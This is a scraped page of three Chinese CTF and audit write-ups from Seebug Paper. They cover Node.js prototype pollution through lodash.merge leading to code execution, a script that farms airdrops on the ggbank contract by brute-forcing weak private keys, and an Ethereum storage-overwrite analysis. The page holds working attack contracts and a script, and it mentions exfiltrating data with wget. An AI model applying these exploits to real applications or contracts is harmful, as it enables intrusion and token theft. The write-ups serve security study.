123456789101112131415161718192021222324252627282930313233343536373839404142const fs = require('fs')const express = require('express')const bodyParser = require('body-parser')const lodash = require('lodash')const session = require('express-session')const randomize = require('randomatic')const app = express()app.use(bodyParser.urlencoded({extended: true})).use(bodyParser.json()) //对post请求的请求体进行解析app.use('/static', express.static('static'))app.use(session({name: 'thejs.session',secret: randomize('aA0', 16), // 随机数resave: false,saveUninitialized: false}))app.engine('ejs', function (filePath, options, callback) { // 模板引擎fs.readFile(filePath, (err, content) => { //读文件 filepathif (err) return callback(new Error(err))let compiled = lodash.template(content) //模板化let rendered = compiled({...options}) //动态引入变量return callback(null, rendered)})})app.set('views', './views')app.set('view engine', 'ejs')app.all('/', (req, res) => {let data = req.session.data || {language: [], category: []}if (req.method == 'POST') {data = lodash.merge(data, req.body) // merge 合并字典req.session.data = data}res.render('index', {language: data.language,category: data.category})})app.listen(3000, () => console.log(`Example app listening on port 3000!`))由于对node不熟,初看代码的时候简单研究了一下各个部分都是干嘛的。然后就发现整个站几乎没什么功能,就是获取输入然后取其中固定的输出,起码就自己写的代码来说不可能有问题。
再三思考下觉得可能问题在引入的包中...比较明显的就是
lodash.merge这句,这句代码在这里非常刻意,于是就顺着这个思路去想,简单翻了一下代码发现没什么收获。后来@spine给了我一个链接js特性
首先我们可以先回顾一下js的一部分特性。
由于js非常面向对象的编程特性,js有很多神奇的操作。
在js中你可以用各种方式操作自己的对象。
在js中,所有的对象都是从各种基础对象继承下来的,所以每个对象都有他的父类,通过prototype可以直接操作修改父类的对象。
而且子类会继承父类的所有方法。
在js中,每个对象都有两个魔术方法,一个是
constructor另一个是__proto__。对于实例来说,constructor代表其构造函数,像前面说的一样,函数可以通过prototype获取其父对象
123456789<span class="kd">function</span> <span class="nx">myclass</span> <span class="p">()</span> <span class="p">{}</span><span class="nx">myclass</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">myfunc</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span><span class="k">return</span> <span class="mi">233</span><span class="p">;}</span><span class="kd">var</span> <span class="nx">inst</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">myclass</span><span class="p">();</span><span class="nx">inst</span><span class="p">.</span><span class="kr">constructor</span> <span class="c1">// return function myclass</span><span class="nx">inst</span><span class="p">.</span><span class="kr">constructor</span><span class="p">.</span><span class="nx">prototype</span> <span class="c1">// return the prototype of myclass</span><span class="nx">inst</span><span class="p">.</span><span class="kr">constructor</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">myfunc</span><span class="p">()</span> <span class="c1">// return 233</span>
而另一个魔术方法
__proto__就等价于.constructor.prototype
由于子类会继承父类的所有方法,所以如果在当前对象中找不到该方法,就会到父类中去找,直到找不到才会爆错
在复习了上面的特性之后,我们回到这个漏洞
回到漏洞
在漏洞分析文中提到了这样一种方式
1https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf假设对于语句
1obj[a][b][c] = value如果我们控制a为constructor,b为prototype,c为某个key,我们是不是就可以为这个对象父类初始化某个值,这个值会被继承到当前对象。同理如果a为
__proto__,b也为__proto__,那么我们就可以为基类Object定义某个值。当然这种代码不会随时都出现,所以在实际场景下,这种攻击方式会影响什么样的操作呢。
首先我们需要理解的就是,我们想办法赋值的
__proto__对象并不是真正的这个对象,如图
所以想要写到真正的
__proto__中,我们需要一层赋值,就如同原文范例代码中的那样
通过这样的操作,我们就可以给Object基类定义一个变量名。
由于子类会继承父类的所有方法,但首先需要保证子类没有定义这个变量,因为只有当前类没有定义这个变量,才会去父类寻找。
在js代码中,经常能遇到这样的代码
123if (!obj.aaa){...}这种情况下,js会去调用obj的aaa方法,如果aaa方法undefined,那么就会跟入到obj的父类中(js不会直接报该变量未定义并终止)。
这种情况下,我们通过定义obj的基类Object的aaa方法,就能操作这个变量,改变原来的代码走向。
最后让我们回到题目中来。
回到题目
回到题目中,这下代码的问题点很清楚了。整个代码有且只有1个输入点也就是
req.body,这个变量刚好通过lodash.merge合并.
这里的
lodash.merge刚好也就是用于将两个对象合并,成功定义了__proto__对象的变量。
我们也可以通过上面的技巧去覆盖某个值,但问题来了,我们怎么才能getshell呢?
顺着这个思路,我需要在整个代码中寻找一个,在影响Object之后,且可以执行命令的地方。
很幸运的是,虽然我没有特别研究明白nodejs,但我还是发现模板是动态生成的。
这里的代码是在请求后完成的(动态渲染?)
跟入到template函数中,可以很清楚的看到
接下来就是这一大串代码中寻找一个可以影响的变量,我们的目标是找一个未定义的变量,且后面有判断调用它
这里的sourceURL刚好符合这个条件,我们直接跟入前面的options定义处,进入函数一直跟下去,直到lodash.js的3515行。
可以看到object本身没有这个方法,但仍然遍历到了,成功注入了这个变量,紧接着渲染模板就成功执行代码了。
完成攻击
其实发现可以注入代码之后就简单了,我朋友说他不能用child_process来执行命令,我测试了一下发现是可以的,只是不能弹shell回来不知道怎么回事。思考了一下决定直接wget外带数据出来吧。
poc
需要注意一定要是json格式,否则
__proto__会解成字符串,开始坑了很久。直接偷懒用ceye接请求,其实用什么都行
本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/755/ -
LCTF2018 ggbank 薅羊毛实战
作者:LoRexxar'@知道创宇404区块链安全研究团队
时间:2018年11月20日11.18号结束的LCTF2018中有一个很有趣的智能合约题目叫做ggbank,题目的原意是考察弱随机数问题,但在题目的设定上挺有意思的,加入了一个对地址的验证,导致弱随机的难度高了许多,反倒是薅羊毛更快乐了,下面就借这个题聊聊关于薅羊毛的实战操作。 分析
源代码
https://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf0831137923841fe3e7258a#code首先我们照例来分析一下源代码
和之前我出的题风格一致,首先是发行了一种token,然后基于token的挑战代码,主要有几个点
123modifier authenticate { //修饰器,在authenticate关键字做修饰器时,会执行该函数require(checkfriend(msg.sender));_; // 对来源做checkfriend判断}跟着看checkfriend函数
123456789101112131415function checkfriend(address _addr) internal pure returns (bool success) {bytes20 addr = bytes20(_addr);bytes20 id = hex"000000000000000000000000000000000007d7ec";bytes20 gg = hex"00000000000000000000000000000000000fffff";for (uint256 i = 0; i < 34; i++) { //逐渐对比最后5位if (addr & gg == id) { // 当地址中包含7d7ec时可以继续return true;}gg <<= 4;id <<= 4;}return false;}checkfriend就是整个挑战最大的难点,也大幅度影响了思考的方向,这个稍后再谈。
12345678function getAirdrop() public authenticate returns (bool success){if (!initialized[msg.sender]) { //空投initialized[msg.sender] = true;balances[msg.sender] = _airdropAmount;_totalSupply += _airdropAmount;}return true;}空投函数没看有什么太可说的,就是对每一个新用户都发一次空投。
然后就是goodluck函数
123456789101112function goodluck() public payable authenticate returns (bool success) {require(!locknumber[block.number]); //判断block.numbrtrequire(balances[msg.sender]>=100); //余额大于100balances[msg.sender]-=100; //每次调用要花费100tokenuint random=uint(keccak256(abi.encodePacked(block.number))) % 100; //随机数if(uint(keccak256(abi.encodePacked(msg.sender))) % 100 == random){ //随机数判断balances[msg.sender]+=20000;_totalSupply +=20000;locknumber[block.number] = true;}return true;}然后只要余额大于200000就可以拿到flag。
其实代码特别简单,漏洞也不难,就是非常常见的弱随机数问题。
随机数的生成方式为
1uint random=uint(keccak256(abi.encodePacked(block.number))) % 100;另一个的生成方式为
1uint(keccak256(abi.encodePacked(msg.sender))) % 100其实非常简单,这两个数字都是已知的,msg.sender可以直接控制已知的地址,那么左值就是已知的,剩下的就是要等待一个右值出现,由于block.number是自增的,我们可以通过提前计算出一个block.number,然后写脚本监控这个值出现,提前开始发起交易抢打包,就ok了。具体我就不详细提了。可以看看出题人的wp。
https://github.com/LCTF/LCTF2018/tree/master/Writeup/gg%20bank
但问题就在于,这种操作要等block.number出现,而且还要抢打包,毕竟还是不稳定的。所以在做题的时候我们关注到另一条路,薅羊毛,这里重点说说这个。
合约薅羊毛
在想到原来的思路过于复杂之后,我就顺理成章的想到薅羊毛这条路,然后第一反正就是直接通过合约建合约的方式来碰这个概率。
思路来自于最早发现的薅羊毛合约https://paper.seebug.org/646/
这个合约有几个很精巧的点。
首先我们需要有基本的概念,在以太坊上发起交易是需要支付gas的,如果我们不通过合约来交易,那么这笔gas就必须先转账过去eth,然后再发起交易,整个过程困难了好几倍不止。
然后就有了新的问题,在合约中新建合约在EVM中,是属于高消费的操作之一,在以太坊中,每一次交易都会打包进一个区块中,而每一个区块都有gas消费的上限,如果超过了上限,就会爆gas out,然后交易回滚,交易就失败了。
123456789101112131415161718192021222324252627282930313233343536373839404142434445contract attack{address target = 0x7caa18D765e5B4c3BF0831137923841FE3e7258a;function checkfriend(address _addr) internal pure returns (bool success) {bytes20 addr = bytes20(_addr);bytes20 id = hex"000000000000000000000000000000000007d7ec";bytes20 gg = hex"00000000000000000000000000000000000fffff";for (uint256 i = 0; i < 34; i++) {if (addr & gg == id) {return true;}gg <<= 4;id <<= 4;}return false;}function attack(){// getairdropif(checkfriend(address(this))){target.call(bytes4(keccak256('getAirdrop()')));target.call(bytes4(keccak256("transfer(address,uint256)")),0xACB7a6Dc0215cFE38e7e22e3F06121D2a1C42f6C, 1000);}}}contract doit{function doit() payable {}function attack_starta() public {for(int i=0;i<=50;i++){new attack();}}function () payable {}}上述的poc中,有一个很特别的点就是我加入了checkfriend的判断,因为我发现循环中如果新建合约的函数调用revert会导致整个交易报错,所以我干脆把整个判断放上来,在判断后再发起交易。
可问题来了,我尝试跑了几波之后发现完全不行,我忽略了一个问题。
让我们回到checkfriend
123456789101112131415function checkfriend(address _addr) internal pure returns (bool success) {bytes20 addr = bytes20(_addr);bytes20 id = hex"000000000000000000000000000000000007d7ec";bytes20 gg = hex"00000000000000000000000000000000000fffff";for (uint256 i = 0; i < 34; i++) {if (addr & gg == id) {return true;}gg <<= 4;id <<= 4;}return false;}checkfriend只接受地址中带有7d7ec的地址交易,光是这几个字母出现的概率就只有
1/36*1/36*1/36*1/36*1/36这个几率在每次随机生成50个合约上计算的话,概率就太小了。必须要找新的办法来解决才行。
python脚本解决方案
既然在合约上没办法,那么我直接换用python写脚本来解决。
这个挑战最大的问题就在于checkfriend这里,那么我们直接换一种思路,如果我们去爆破私钥去恢复地址,是不是更有效一点儿?
其实爆破的方式非常多,但有的恢复特别慢,也不知道瓶颈在哪,在换了几种方式之后呢,我终于找到了一个特别快的恢复方式。
12345from ethereum.utils import privtoaddr, encode_hexfor i in range(1000000,100000000):private_key = "%064d" % iaddress = "0x" + encode_hex(privtoaddr(private_key))我们拿到了地址之后就简单了,首先先转0.01eth给它,然后用私钥发起交易,获得空投、转账回来。
需要注意的是,转账之后需要先等到转账这个交易打包成功,之后才能继续下一步交易,需要多设置一步等待。
有个更快的方案是,先跑出200个地址,然后再批量转账,最后直接跑起来,不过想了一下感觉其实差不太多,因为整个脚本跑下来也就不到半小时,速度还是很可观的。
脚本如下
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341import ecdsaimport sha3from binascii import hexlify, unhexlifyfrom ethereum.utils import privtoaddr, encode_hexfrom web3 import Web3import osimport tracebackimport timemy_ipc = Web3.HTTPProvider("https://ropsten.infura.io/v3/6528deebaeba45f8a0d005b570bef47d")assert my_ipc.isConnected()w3 = Web3(my_ipc)target = "0x7caa18D765e5B4c3BF0831137923841FE3e7258a"ggbank = [{"constant": True,"inputs": [],"name": "name","outputs": [{"name": "","type": "string"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": True,"inputs": [],"name": "totalSupply","outputs": [{"name": "","type": "uint256"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": True,"inputs": [{"name": "","type": "address"}],"name": "balances","outputs": [{"name": "","type": "uint256"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": True,"inputs": [],"name": "INITIAL_SUPPLY","outputs": [{"name": "","type": "uint256"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": True,"inputs": [],"name": "decimals","outputs": [{"name": "","type": "uint8"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": True,"inputs": [],"name": "_totalSupply","outputs": [{"name": "","type": "uint256"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": True,"inputs": [],"name": "_airdropAmount","outputs": [{"name": "","type": "uint256"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": True,"inputs": [{"name": "owner","type": "address"}],"name": "balanceOf","outputs": [{"name": "","type": "uint256"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": True,"inputs": [],"name": "owner","outputs": [{"name": "","type": "address"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": True,"inputs": [],"name": "symbol","outputs": [{"name": "","type": "string"}],"payable": False,"stateMutability": "view","type": "function"},{"constant": False,"inputs": [{"name": "_to","type": "address"},{"name": "_value","type": "uint256"}],"name": "transfer","outputs": [{"name": "success","type": "bool"}],"payable": False,"stateMutability": "nonpayable","type": "function"},{"constant": False,"inputs": [{"name": "b64email","type": "string"}],"name": "PayForFlag","outputs": [{"name": "success","type": "bool"}],"payable": True,"stateMutability": "payable","type": "function"},{"constant": False,"inputs": [],"name": "getAirdrop","outputs": [{"name": "success","type": "bool"}],"payable": False,"stateMutability": "nonpayable","type": "function"},{"constant": False,"inputs": [],"name": "goodluck","outputs": [{"name": "success","type": "bool"}],"payable": True,"stateMutability": "payable","type": "function"},{"inputs": [],"payable": False,"stateMutability": "nonpayable","type": "constructor"},{"anonymous": False,"inputs": [{"indexed": False,"name": "b64email","type": "string"},{"indexed": False,"name": "back","type": "string"}],"name": "GetFlag","type": "event"}]mytarget = "0xACB7a6Dc0215cFE38e7e22e3F06121D2a1C42f6C"mytarget_private_key = 这是私钥transaction_dict = {'chainId': 3,'from':Web3.toChecksumAddress(mytarget),'to':'', # empty address for deploying a new contract'gasPrice':10000000000,'gas':200000,'nonce': None,'value':10000000000000000,'data':""}ggbank_ins = w3.eth.contract(abi=ggbank)ggbank_ins = ggbank_ins(address=Web3.toChecksumAddress(target))nonce = 0def transfer(address, private_key):print(address)global nonce# 发钱if not nonce:nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(mytarget))transaction_dict['nonce'] = noncetransaction_dict['to'] = Web3.toChecksumAddress(address)signed = w3.eth.account.signTransaction(transaction_dict, mytarget_private_key)result = w3.eth.sendRawTransaction(signed.rawTransaction)nonce +=1while 1:if w3.eth.getBalance(Web3.toChecksumAddress(address)) >0:breaktime.sleep(1)# 空投nonce2 = w3.eth.getTransactionCount(Web3.toChecksumAddress(address))transaction2 = ggbank_ins.functions.getAirdrop().buildTransaction({'chainId': 3, 'gas': 200000, 'nonce': nonce2, 'gasPrice': w3.toWei('1', 'gwei')})print(transaction2)signed2 = w3.eth.account.signTransaction(transaction2, private_key)result2 = w3.eth.sendRawTransaction(signed2.rawTransaction)# 转账nonce2+=1transaction3 = ggbank_ins.functions.transfer(mytarget, int(1000)).buildTransaction({'chainId': 3, 'gas': 200000, 'nonce': nonce2, 'gasPrice': w3.toWei('1', 'gwei')})print(transaction3)signed3 = w3.eth.account.signTransaction(transaction3, private_key)result3 = w3.eth.sendRawTransaction(signed3.rawTransaction)if __name__ == '__main__':j = 0for i in range(1000000,100000000):private_key = "%064d" % i# address = create_address(private_key)# print(address)# if "7d7ec" in address:# print(address)address = "0x" + encode_hex(privtoaddr(private_key))if "7d7ec" in address:private_key = unhexlify(private_key)print(j)try:transfer(address, private_key)except:traceback.print_exc()print("error:"+str(j))j+=1最终效果显著
本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/747/ -
以太坊合约审计 CheckList 之变量覆盖问题
作者:LoRexxar'@知道创宇404区块链安全研究团队
时间:2018年11月16日系列文章:- 《以太坊智能合约审计 CheckList》
- 《以太坊合约审计 CheckList 之“以太坊智能合约规范问题”影响分析报告》
- 《以太坊合约审计 CheckList 之“以太坊智能合约设计缺陷问题”影响分析报告》
- 《以太坊合约审计 CheckList 之“以太坊智能合约编码安全问题”影响分析报告》
- 《以太坊合约审计 CheckList 之“以太坊智能合约编码设计问题”影响分析报告》
- 《以太坊合约审计 CheckList 之“以太坊智能合约编码隐患”影响分析报告》
2018年11月6日,DVP上线了一场“地球OL真实盗币游戏”,其中第二题是一道智能合约题目,题目中涉及到的了一个很有趣的问题,这里拿出来详细说说看。
https://etherscan.io/address/0x5170a14aa36245a8a9698f23444045bdc4522e0a#code
Writeup
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124pragma solidity ^0.4.21;library SafeMath {function mul(uint256 a, uint256 b) internal pure returns (uint256) {if (a == 0) {return 0;}uint256 c = a * b;assert(c / a == b);return c;}function div(uint256 a, uint256 b) internal pure returns (uint256) {uint256 c = a / b;return c;}function sub(uint256 a, uint256 b) internal pure returns (uint256) {assert(b <= a);return a - b;}function add(uint256 a, uint256 b) internal pure returns (uint256) {uint256 c = a + b;assert(c >= a);return c;}}contract ERC20Basic {function totalSupply() public view returns (uint256);function balanceOf(address who) public view returns (uint256);function transfer(address to, uint256 value) public returns (bool);event Transfer(address indexed from, address indexed to, uint256 value);}contract ERC20 is ERC20Basic {function allowance(address owner, address spender) public view returns (uint256);function transferFrom(address from, address to, uint256 value) public returns (bool);function approve(address spender, uint256 value) public returns (bool);event Approval(address indexed owner,address indexed spender,uint256 value);}library SafeERC20 {function safeTransfer(ERC20Basic token, address to, uint256 value) internal {require(token.transfer(to, value));}function safeTransferFrom(ERC20 token,address from,address to,uint256 value)internal{require(token.transferFrom(from, to, value));}function safeApprove(ERC20 token, address spender, uint256 value) internal {require(token.approve(spender, value));}}contract DVPgame {ERC20 public token;uint256[] map;using SafeERC20 for ERC20;using SafeMath for uint256;constructor(address addr) payable{token = ERC20(addr);}function (){if(map.length>=uint256(msg.sender)){require(map[uint256(msg.sender)]!=1);}if(token.balanceOf(this)==0){//airdrop is overselfdestruct(msg.sender);}else{token.safeTransfer(msg.sender,100);if (map.length <= uint256(msg.sender)) {map.length = uint256(msg.sender) + 1;}map[uint256(msg.sender)] = 1;}}//Guess the value(param:x) of the keccak256 value modulo 10000 of the future block (param:blockNum)function guess(uint256 x,uint256 blockNum) public payable {require(msg.value == 0.001 ether || token.allowance(msg.sender,address(this))>=1*(10**18));require(blockNum>block.number);if(token.allowance(msg.sender,address(this))>0){token.safeTransferFrom(msg.sender,address(this),1*(10**18));}if (map.length <= uint256(msg.sender)+x) {map.length = uint256(msg.sender)+x + 1;}map[uint256(msg.sender)+x] = blockNum;}//Run a lotteryfunction lottery(uint256 x) public {require(map[uint256(msg.sender)+x]!=0);require(block.number > map[uint256(msg.sender)+x]);require(block.blockhash(map[uint256(msg.sender)+x])!=0);uint256 answer = uint256(keccak256(block.blockhash(map[uint256(msg.sender)+x])))%10000;if (x == answer) {token.safeTransfer(msg.sender,token.balanceOf(address(this)));selfdestruct(msg.sender);}}}看着代码那么长,但其实核心代码就后面这点。
fallback函数
1234567891011121314151617<span class="kd">function</span> <span class="p">(){</span><span class="k">if</span><span class="p">(</span><span class="nx">map</span><span class="p">.</span><span class="nx">length</span><span class="o">>=</span><span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)){</span><span class="nx">require</span><span class="p">(</span><span class="nx">map</span><span class="p">[</span><span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)]</span><span class="o">!=</span><span class="mi">1</span><span class="p">);</span><span class="p">}</span><span class="k">if</span><span class="p">(</span><span class="nx">token</span><span class="p">.</span><span class="nx">balanceOf</span><span class="p">(</span><span class="k">this</span><span class="p">)</span><span class="o">==</span><span class="mi">0</span><span class="p">){</span><span class="c1">//airdrop is over</span><span class="nx">selfdestruct</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">);</span> <span class="c1">//如果token花完了,就会自动销毁自己发送余额</span><span class="p">}</span><span class="k">else</span><span class="p">{</span><span class="nx">token</span><span class="p">.</span><span class="nx">safeTransfer</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">,</span><span class="mi">100</span><span class="p">);</span> <span class="c1">// 否则就给你转100token</span><span class="k">if</span> <span class="p">(</span><span class="nx">map</span><span class="p">.</span><span class="nx">length</span> <span class="o"><=</span> <span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">))</span> <span class="p">{</span><span class="nx">map</span><span class="p">.</span><span class="nx">length</span> <span class="o">=</span> <span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// 通过做map变量偏移操作来使空投只发1次</span><span class="p">}</span><span class="nx">map</span><span class="p">[</span><span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span><span class="p">}</span><span class="p">}</span>简单来说就是每个地址只发一次空投,然后如果余额空投完了就会销毁自己转账。
guess函数
12345678910111213<span class="c1">//Guess the value(param:x) of the keccak256 value modulo 10000 of the future block (param:blockNum)</span><span class="kd">function</span> <span class="nx">guess</span><span class="p">(</span><span class="nx">uint256</span> <span class="nx">x</span><span class="p">,</span><span class="nx">uint256</span> <span class="nx">blockNum</span><span class="p">)</span> <span class="kr">public</span> <span class="nx">payable</span> <span class="p">{</span><span class="nx">require</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">value</span> <span class="o">==</span> <span class="mf">0.001</span> <span class="nx">ether</span> <span class="o">||</span> <span class="nx">token</span><span class="p">.</span><span class="nx">allowance</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">,</span><span class="nx">address</span><span class="p">(</span><span class="k">this</span><span class="p">))</span><span class="o">>=</span><span class="mi">1</span><span class="o">*</span><span class="p">(</span><span class="mi">10</span><span class="o">**</span><span class="mi">18</span><span class="p">));</span> <span class="c1">// guess要花费0.001 ether</span><span class="nx">require</span><span class="p">(</span><span class="nx">blockNum</span><span class="o">></span><span class="nx">block</span><span class="p">.</span><span class="kt">number</span><span class="p">);</span> <span class="c1">// blockNum要大于当前block.number</span><span class="k">if</span><span class="p">(</span><span class="nx">token</span><span class="p">.</span><span class="nx">allowance</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">,</span><span class="nx">address</span><span class="p">(</span><span class="k">this</span><span class="p">))</span><span class="o">></span><span class="mi">0</span><span class="p">){</span><span class="nx">token</span><span class="p">.</span><span class="nx">safeTransferFrom</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">,</span><span class="nx">address</span><span class="p">(</span><span class="k">this</span><span class="p">),</span><span class="mi">1</span><span class="o">*</span><span class="p">(</span><span class="mi">10</span><span class="o">**</span><span class="mi">18</span><span class="p">));</span> <span class="c1">//转账</span><span class="p">}</span><span class="k">if</span> <span class="p">(</span><span class="nx">map</span><span class="p">.</span><span class="nx">length</span> <span class="o"><=</span> <span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)</span><span class="o">+</span><span class="nx">x</span><span class="p">)</span> <span class="p">{</span><span class="nx">map</span><span class="p">.</span><span class="nx">length</span> <span class="o">=</span> <span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)</span><span class="o">+</span><span class="nx">x</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span><span class="p">}</span><span class="nx">map</span><span class="p">[</span><span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)</span><span class="o">+</span><span class="nx">x</span><span class="p">]</span> <span class="o">=</span> <span class="nx">blockNum</span><span class="p">;</span> <span class="c1">// 可以想向任意地址写入blockNum</span><span class="p">}</span>lottery函数
12345678910111213<span class="kd">function</span> <span class="nx">lottery</span><span class="p">(</span><span class="nx">uint256</span> <span class="nx">x</span><span class="p">)</span> <span class="kr">public</span> <span class="p">{</span><span class="nx">require</span><span class="p">(</span><span class="nx">map</span><span class="p">[</span><span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)</span><span class="o">+</span><span class="nx">x</span><span class="p">]</span><span class="o">!=</span><span class="mi">0</span><span class="p">);</span> <span class="c1">// 目标地址必须有值</span><span class="nx">require</span><span class="p">(</span><span class="nx">block</span><span class="p">.</span><span class="kt">number</span> <span class="o">></span> <span class="nx">map</span><span class="p">[</span><span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)</span><span class="o">+</span><span class="nx">x</span><span class="p">]);</span> <span class="c1">// 这点是和前面guess函数对应,必须在之后开奖</span><span class="nx">require</span><span class="p">(</span><span class="nx">block</span><span class="p">.</span><span class="nx">blockhash</span><span class="p">(</span><span class="nx">map</span><span class="p">[</span><span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)</span><span class="o">+</span><span class="nx">x</span><span class="p">])</span><span class="o">!=</span><span class="mi">0</span><span class="p">);</span> <span class="c1">// 不能使中间的参数为当前块为0</span><span class="nx">uint256</span> <span class="nx">answer</span> <span class="o">=</span> <span class="nx">uint256</span><span class="p">(</span><span class="nx">keccak256</span><span class="p">(</span><span class="nx">block</span><span class="p">.</span><span class="nx">blockhash</span><span class="p">(</span><span class="nx">map</span><span class="p">[</span><span class="nx">uint256</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">)</span><span class="o">+</span><span class="nx">x</span><span class="p">])))</span><span class="o">%</span><span class="mi">10000</span><span class="p">;</span><span class="c1">// 计算hash的后4位</span><span class="k">if</span> <span class="p">(</span><span class="nx">x</span> <span class="o">==</span> <span class="nx">answer</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// 如果相等,则转账并销毁</span><span class="nx">token</span><span class="p">.</span><span class="nx">safeTransfer</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">,</span><span class="nx">token</span><span class="p">.</span><span class="nx">balanceOf</span><span class="p">(</span><span class="nx">address</span><span class="p">(</span><span class="k">this</span><span class="p">)));</span><span class="nx">selfdestruct</span><span class="p">(</span><span class="nx">msg</span><span class="p">.</span><span class="nx">sender</span><span class="p">);</span><span class="p">}</span><span class="p">}</span>其实回到题目本身来看,我们的目的是要拿走合约里的所有eth,在合约里,唯一仅有的转账办法就是
selfdestruct,所以我们的目的就是想办法触发这个函数。销毁函数只在fallback和lottery函数中存在,其实阅读一下不难发现,lottery不可能有任何操作,没办法溢出,没办法修改,除非运气逆天,否则不可能从lottery函数触发这个函数。
所以目光回到fallback函数,要满足转账,我们需要想办法让
balanceOf返回0,如果我们想要通过薅羊毛的方式去解决的话简单测试就会明白这不可能,因为一次只能转100,余额如果我没记错的话,应该超过万亿以上。很显然,想通过空投要薅羊毛来获得flag基本不太可能,所以我们的目标就是,如何影响到
balanceOf的返回。而balanceOf这个函数是来自于token变量的
123constructor(address addr) payable{token = ERC20(addr);}而token变量是一个全局变量,在开始被定义
1234567pragma solidity ^0.4.21;contract DVPgame {ERC20 public token;uint256[] map;using SafeERC20 for ERC20;using SafeMath for uint256;...在 EVM 中存储有三种方式,分别是 memory、storage 以及 stack。
memory : 内存,生命周期仅为整个方法执行期间,函数调用后回收,因为仅保存临时变量,故GAS开销很小 storage : 永久储存在区块链中,由于会永久保存合约状态变量,故GAS开销也最大 stack : 存放部分局部值类型变量,几乎免费使用的内存,但有数量限制
而全局变量就是存在storage中的,合约中的全局变量有以下几个
1234ERC20 public token;uint256[] map;using SafeERC20 for ERC20;using SafeMath for uint256;而token就是第一个全局变量,则storage[0]就存了token变量。
然后回到我们前面的需求,我们怎么才有可能覆盖storage的第一块数据呢,让我们再回到代码。guess中有这么一段代码。
1map[uint256(msg.sender)+x] = blockNum;在EVM中数组和其他类型不同,因为数组时动态大小的,所以数组类型的数据计算方式为
1address(map_data) = sha(array_slot)+offset其中array_slot就是map变量数据的位置,也就是1,offset就是数组中的偏移,比如map[2],offset就是2.
这样一来,map[2]的地址就是
sha(1)+2,假设map[2]=2333,则storage[sha(1)+2]=2333。这样一来就出现问题了,由于offset我们可控,我们就可以向storage的任意地址写值。
再加上storage不是无限大的,它最多只有2**256那么大,sha(1)是固定的0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6。
也就是说我们设置x为
2**256-0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,storage就会溢出,并覆盖token变量。所以思路就比较清楚了,构造攻击合约,然后定义balanceOf返回0,调用fallback函数,然后返回即可。
利用合约大致如下
